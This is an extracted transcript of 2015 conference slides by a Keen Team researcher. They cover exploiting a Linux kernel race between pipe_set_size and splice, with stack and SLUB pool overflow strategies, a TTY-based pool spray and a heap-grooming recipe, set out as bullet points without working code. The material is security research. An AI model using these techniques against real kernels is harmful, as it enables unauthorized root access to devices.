confidence 2015: when something overflowing... - peter hlavaty
TRANSCRIPT
![Page 1: CONFidence 2015: when something overflowing... - Peter Hlavaty](https://reader036.vdocuments.site/reader036/viewer/2022062406/55b775c1bb61eb660c8b4578/html5/thumbnails/1.jpg)
SPLICE™
When is something
overflowing
![Page 2: CONFidence 2015: when something overflowing... - Peter Hlavaty](https://reader036.vdocuments.site/reader036/viewer/2022062406/55b775c1bb61eb660c8b4578/html5/thumbnails/2.jpg)
Log
PoC
Bug
More problems
Stack overflow
Buffer overflow
Overflowing too much
No data problem
Memory pools and SLUB
introduction
一步一步
![Page 3: CONFidence 2015: when something overflowing... - Peter Hlavaty](https://reader036.vdocuments.site/reader036/viewer/2022062406/55b775c1bb61eb660c8b4578/html5/thumbnails/3.jpg)
#trinity#race condition
#2012#< 3.4.67
#most of droids 2014
https://lkml.org/lkml/2012/6/6/713
Date
=> Wed, 6 Jun 2012 22:51:17 -0400
From
=> Dave Jones <>
Subject
=> vmsplice triggering bug in kfree.
![Page 4: CONFidence 2015: when something overflowing... - Peter Hlavaty](https://reader036.vdocuments.site/reader036/viewer/2022062406/55b775c1bb61eb660c8b4578/html5/thumbnails/4.jpg)
PoC
https://lkml.org/lkml/2012/6/7/156
RACE:
fcntl => pipe_set_size
vmsplice / splice => do_splice
![Page 5: CONFidence 2015: when something overflowing... - Peter Hlavaty](https://reader036.vdocuments.site/reader036/viewer/2022062406/55b775c1bb61eb660c8b4578/html5/thumbnails/5.jpg)
Multiple access to pipe->buffers
No locks present
Fast alloc => from stack
Big alloc => from heap
Race to confuse its origin!
BUG - RACE
![Page 6: CONFidence 2015: when something overflowing... - Peter Hlavaty](https://reader036.vdocuments.site/reader036/viewer/2022062406/55b775c1bb61eb660c8b4578/html5/thumbnails/6.jpg)
not one function issue only!
![Page 7: CONFidence 2015: when something overflowing... - Peter Hlavaty](https://reader036.vdocuments.site/reader036/viewer/2022062406/55b775c1bb61eb660c8b4578/html5/thumbnails/7.jpg)
default_file_splice_read
@race, @controlled content,@stack overflow, @buffer overflow
![Page 8: CONFidence 2015: when something overflowing... - Peter Hlavaty](https://reader036.vdocuments.site/reader036/viewer/2022062406/55b775c1bb61eb660c8b4578/html5/thumbnails/8.jpg)
![Page 9: CONFidence 2015: when something overflowing... - Peter Hlavaty](https://reader036.vdocuments.site/reader036/viewer/2022062406/55b775c1bb61eb660c8b4578/html5/thumbnails/9.jpg)
Stack overflow options
1. No canaries!
2. Attack LR => PC
3. Target params!
4. Target locals
5. …
6. Fail on splice shrink
![Page 10: CONFidence 2015: when something overflowing... - Peter Hlavaty](https://reader036.vdocuments.site/reader036/viewer/2022062406/55b775c1bb61eb660c8b4578/html5/thumbnails/10.jpg)
Stack attack revival !!
1. Lets pipe->buffers be small == stack alloc
2. Race pie->buffers before kmalloc to vec => aka vec = kmalloc
3. Race again, before splice shrink!
4. Pwn stack by spd.pages!
5. …
6. Need to handle with stack layout per ROM, sometimes not possible – aka bad layout
7. FAIL most of time, 2 races in short time! 99.9999999%
![Page 11: CONFidence 2015: when something overflowing... - Peter Hlavaty](https://reader036.vdocuments.site/reader036/viewer/2022062406/55b775c1bb61eb660c8b4578/html5/thumbnails/11.jpg)
WHAT NEXT ?
![Page 12: CONFidence 2015: when something overflowing... - Peter Hlavaty](https://reader036.vdocuments.site/reader036/viewer/2022062406/55b775c1bb61eb660c8b4578/html5/thumbnails/12.jpg)
BUFFER OVERFLOW
@kernel pool, @SLUB, @pipe_set_size, @kmalloc
![Page 13: CONFidence 2015: when something overflowing... - Peter Hlavaty](https://reader036.vdocuments.site/reader036/viewer/2022062406/55b775c1bb61eb660c8b4578/html5/thumbnails/13.jpg)
Lets do pool overflow! (SLUB)
Tactic1. pipe->buffers > PIPE_DEF_BUFFERS
means no panic if kfree!
2. race pipe->buffers to be bigger than passed to kmalloc
means overflow
3. read our controlled content (kernel_readv)
4. pwn some adjacent data to kmalloced buffer
ptr is kernel one, but data are controlled
problems
1. we overflow with IOVEC structure!!
{ KERNEL PTR, 0x1000 }
No so cool controlled, but still controlled enough!
2. we do kmalloc followed by overflow
means, targeted buffer should be positioned already!
kmalloc should return memory right before targeted buffer
3. we do kmalloc not only for VEC buffer!
Multiple overflows!
Multiple chances to panic!
![Page 14: CONFidence 2015: when something overflowing... - Peter Hlavaty](https://reader036.vdocuments.site/reader036/viewer/2022062406/55b775c1bb61eb660c8b4578/html5/thumbnails/14.jpg)
DEFAULTFILE
SPLICEREAD
struct iovec *vec;
struct splice_pipe_desc {
struct page **pages;
struct partial_page *partial;
…
}
POSSIBLE TO EXIT SOONER!
”/dev/null”GOOD : Reduce overflowing buffers
- vec struct iovec (size == 8)
- spd.pages struct page (size == 4)
BAD : different SLAB
=> not following buffers, overflow something different
=> kfree_skb problem!!
![Page 15: CONFidence 2015: when something overflowing... - Peter Hlavaty](https://reader036.vdocuments.site/reader036/viewer/2022062406/55b775c1bb61eb660c8b4578/html5/thumbnails/15.jpg)
BUT ! DATA CONTENT PROBLEM ! Wtf, we exit too soon due to error on
data read, no controlled data anymore ?
![Page 16: CONFidence 2015: when something overflowing... - Peter Hlavaty](https://reader036.vdocuments.site/reader036/viewer/2022062406/55b775c1bb61eb660c8b4578/html5/thumbnails/16.jpg)
NEW POOL SPRAY ?
default_file_splice_read
.. AGAIN ..
![Page 17: CONFidence 2015: when something overflowing... - Peter Hlavaty](https://reader036.vdocuments.site/reader036/viewer/2022062406/55b775c1bb61eb660c8b4578/html5/thumbnails/17.jpg)
POOL SPRAY NOT SO EASY
1. You have to ship data to pipe
2. With splice
3. Splice have to use default_file_splice_read
4. /dev/ptmx a.k.a TTY
5. You can to load data to TTY
6. Splice to pipe
7. Read from pipe
1. We have just limited number of TTY == 0x1fd to be exact
2. Not enough for pool spray, but not necessary anyway repeat!!
3. avoiding memory pressure as side effect!
![Page 18: CONFidence 2015: when something overflowing... - Peter Hlavaty](https://reader036.vdocuments.site/reader036/viewer/2022062406/55b775c1bb61eb660c8b4578/html5/thumbnails/18.jpg)
NEW POOL SPRAY!
NO MEMORY PRESSURE!
CONTROLLED DATA!
![Page 19: CONFidence 2015: when something overflowing... - Peter Hlavaty](https://reader036.vdocuments.site/reader036/viewer/2022062406/55b775c1bb61eb660c8b4578/html5/thumbnails/19.jpg)
SPRAY Implementation
Why design matter #1
![Page 20: CONFidence 2015: when something overflowing... - Peter Hlavaty](https://reader036.vdocuments.site/reader036/viewer/2022062406/55b775c1bb61eb660c8b4578/html5/thumbnails/20.jpg)
VULN IMPLEMENTATION
Why design matter #2
![Page 21: CONFidence 2015: when something overflowing... - Peter Hlavaty](https://reader036.vdocuments.site/reader036/viewer/2022062406/55b775c1bb61eb660c8b4578/html5/thumbnails/21.jpg)
Overflows vs Kernel Pool
SLUB
Randomization
but chosen mainly from last SLAB
SLAB organized by size
similar sized objects
covered by same SLAB
![Page 22: CONFidence 2015: when something overflowing... - Peter Hlavaty](https://reader036.vdocuments.site/reader036/viewer/2022062406/55b775c1bb61eb660c8b4578/html5/thumbnails/22.jpg)
Probe and pwn!
1. choose two semi-controlled objects
2. Target and Victim
3. Should cover same SLAB
4. Full many SLABs by target
5. Free one target per SLAB
6. Try to fill holes by victim
7. Trigger over/under flow from victim to hit target
8. pwn
![Page 23: CONFidence 2015: when something overflowing... - Peter Hlavaty](https://reader036.vdocuments.site/reader036/viewer/2022062406/55b775c1bb61eb660c8b4578/html5/thumbnails/23.jpg)
memory object separation
• Linux kernel – caches
• many times object specific cache
• But cache can be fully filled as well
• Then need to allocate new one
• Reallocation cache can be played with!
• Not so easy as with normal objects, but doable ..
• Windows kernel – sessions
• Many powerful objects in same session
• Choose one of them & pwn
![Page 24: CONFidence 2015: when something overflowing... - Peter Hlavaty](https://reader036.vdocuments.site/reader036/viewer/2022062406/55b775c1bb61eb660c8b4578/html5/thumbnails/24.jpg)
POWER lies in DESIGN
Full control about kmalloc & kfree
Control (at least semi!) about the object content
Objects contains plain *pointers* and
members
No integrity checks on member state
No effective sentinels (page_noaccess) between objects /
memory chunks even on 64bit!
Limited Randomization -everytime same
chunk base
http
://ww
w.s
lideshare
.net/
Pete
rHla
vaty
/back-to
-the-c
ore
![Page 25: CONFidence 2015: when something overflowing... - Peter Hlavaty](https://reader036.vdocuments.site/reader036/viewer/2022062406/55b775c1bb61eb660c8b4578/html5/thumbnails/25.jpg)
SPLICE not done yet …
Whats COVERED BY PRESO
Race no problem
Reduced overflow to 2 buffers (vec, pages)
Spray to fill data to controlled state
Play with SLUB
TODO OWN-RESEARCH
WHAT is our TARGET ?
EXEC ?
PXN ?
PAN & arm64 ?
![Page 26: CONFidence 2015: when something overflowing... - Peter Hlavaty](https://reader036.vdocuments.site/reader036/viewer/2022062406/55b775c1bb61eb660c8b4578/html5/thumbnails/26.jpg)
Hint : kmalloc and pipe_set_size
We set sizes for kmalloc trough pipe_set_size
pipe_set_size (->buffers) is limited to some sizes
1, 2, 4, 8, 0x10, 0x20, 0x40, 0x80, 0x100
That’s all!
We are not interested in content of pipe, just about pipe->buffers, because …
kmalloc take those sizes and multiply by siozeof(iovec) !
On kmalloc goes only sizes :
0x20, 0x40, 0x80, 0x100
Results in following kmallocs :
0x80, 0x100, 0x200, 0x400
Here is necessary some techs!
For TTY was used tty_buffer, size in 0x400 SLAB, cool!
But magic there, and we scatter it because of pattern
{ KERNEL PTR, 0x1000 }
Some other candidates ?
![Page 27: CONFidence 2015: when something overflowing... - Peter Hlavaty](https://reader036.vdocuments.site/reader036/viewer/2022062406/55b775c1bb61eb660c8b4578/html5/thumbnails/27.jpg)
btw.Software Security!
.. tale about calculator : how some guys protect others ..
![Page 28: CONFidence 2015: when something overflowing... - Peter Hlavaty](https://reader036.vdocuments.site/reader036/viewer/2022062406/55b775c1bb61eb660c8b4578/html5/thumbnails/28.jpg)
Attack chain
• Social engineering
• Vulnerability
Attack vector
• Killing 0days proactive solution!
Prevent to automatic install
malware • Cure after-effects
Dissecting malware
If proactive fails
Targeted attack here won already!
![Page 29: CONFidence 2015: when something overflowing... - Peter Hlavaty](https://reader036.vdocuments.site/reader036/viewer/2022062406/55b775c1bb61eb660c8b4578/html5/thumbnails/29.jpg)
Aftermath
Low hanging fruits
Poping calcs
Good luck …
![Page 30: CONFidence 2015: when something overflowing... - Peter Hlavaty](https://reader036.vdocuments.site/reader036/viewer/2022062406/55b775c1bb61eb660c8b4578/html5/thumbnails/30.jpg)
https://twitter.com/JohnLaTwC/status/601101229939294208/photo/1
![Page 31: CONFidence 2015: when something overflowing... - Peter Hlavaty](https://reader036.vdocuments.site/reader036/viewer/2022062406/55b775c1bb61eb660c8b4578/html5/thumbnails/31.jpg)
.. shameless plug ..
#whoarewe
![Page 32: CONFidence 2015: when something overflowing... - Peter Hlavaty](https://reader036.vdocuments.site/reader036/viewer/2022062406/55b775c1bb61eb660c8b4578/html5/thumbnails/32.jpg)
KEEN TEAM - TIMELINE
2010前 2010.72010-2012
Pwn2Own 2013 Pwn2own 2014
Emergencyexperts
Global Platinum prize XP Guard SecurityAlliance
GeekPwn 2014
EvaluationCNMSRCfounding team
2013.11 2014.2 2014.3 2014.10
Project Zero
2014.12
Tesla recognition
2014.11
Pwn2Own 2015
2015.3 2015.4
CodeGate CTF – 0ops
![Page 33: CONFidence 2015: when something overflowing... - Peter Hlavaty](https://reader036.vdocuments.site/reader036/viewer/2022062406/55b775c1bb61eb660c8b4578/html5/thumbnails/33.jpg)
KEEN TEAM - GEEKS
http://forum.xda-developers.com/galaxy-s6/general/
root-pingpongroot-s6-root-tool-t3103016/post60600131
PINGP0NG ROOTwushi (@team509)
memeda (@antlr7)
idl3r (xda : idler1984)
Qoobee (@EvilLeoC)
@K33nTeam
![Page 34: CONFidence 2015: when something overflowing... - Peter Hlavaty](https://reader036.vdocuments.site/reader036/viewer/2022062406/55b775c1bb61eb660c8b4578/html5/thumbnails/34.jpg)
KEEN TEAM - TECHNIQUES
Isolated heap bypass [ blog – MS14-056 ]
CC-shellcoding framework [ nosuchcon ]
Webkit exploitation [ cansecwest ]
VadRoot (vm_area) + PageTable pwn [ syscan ]
Pool spray tech [ confidence ]
1bit flip - kernel escape (kernel code exec) [ recon ]
![Page 35: CONFidence 2015: when something overflowing... - Peter Hlavaty](https://reader036.vdocuments.site/reader036/viewer/2022062406/55b775c1bb61eb660c8b4578/html5/thumbnails/35.jpg)
KEEN TEAM - KNOWLEDGE
* multiple presentations on chinese domestic conferences & lectures at universities not listed here
ten months highlights
![Page 36: CONFidence 2015: when something overflowing... - Peter Hlavaty](https://reader036.vdocuments.site/reader036/viewer/2022062406/55b775c1bb61eb660c8b4578/html5/thumbnails/36.jpg)
10.24.2015
Pick a device, name your own challenge!
![Page 37: CONFidence 2015: when something overflowing... - Peter Hlavaty](https://reader036.vdocuments.site/reader036/viewer/2022062406/55b775c1bb61eb660c8b4578/html5/thumbnails/37.jpg)
Thank You!
Q & A
@K33nTeamhr (at) keencloudtech.com
We are hiring! :)Interns wanted!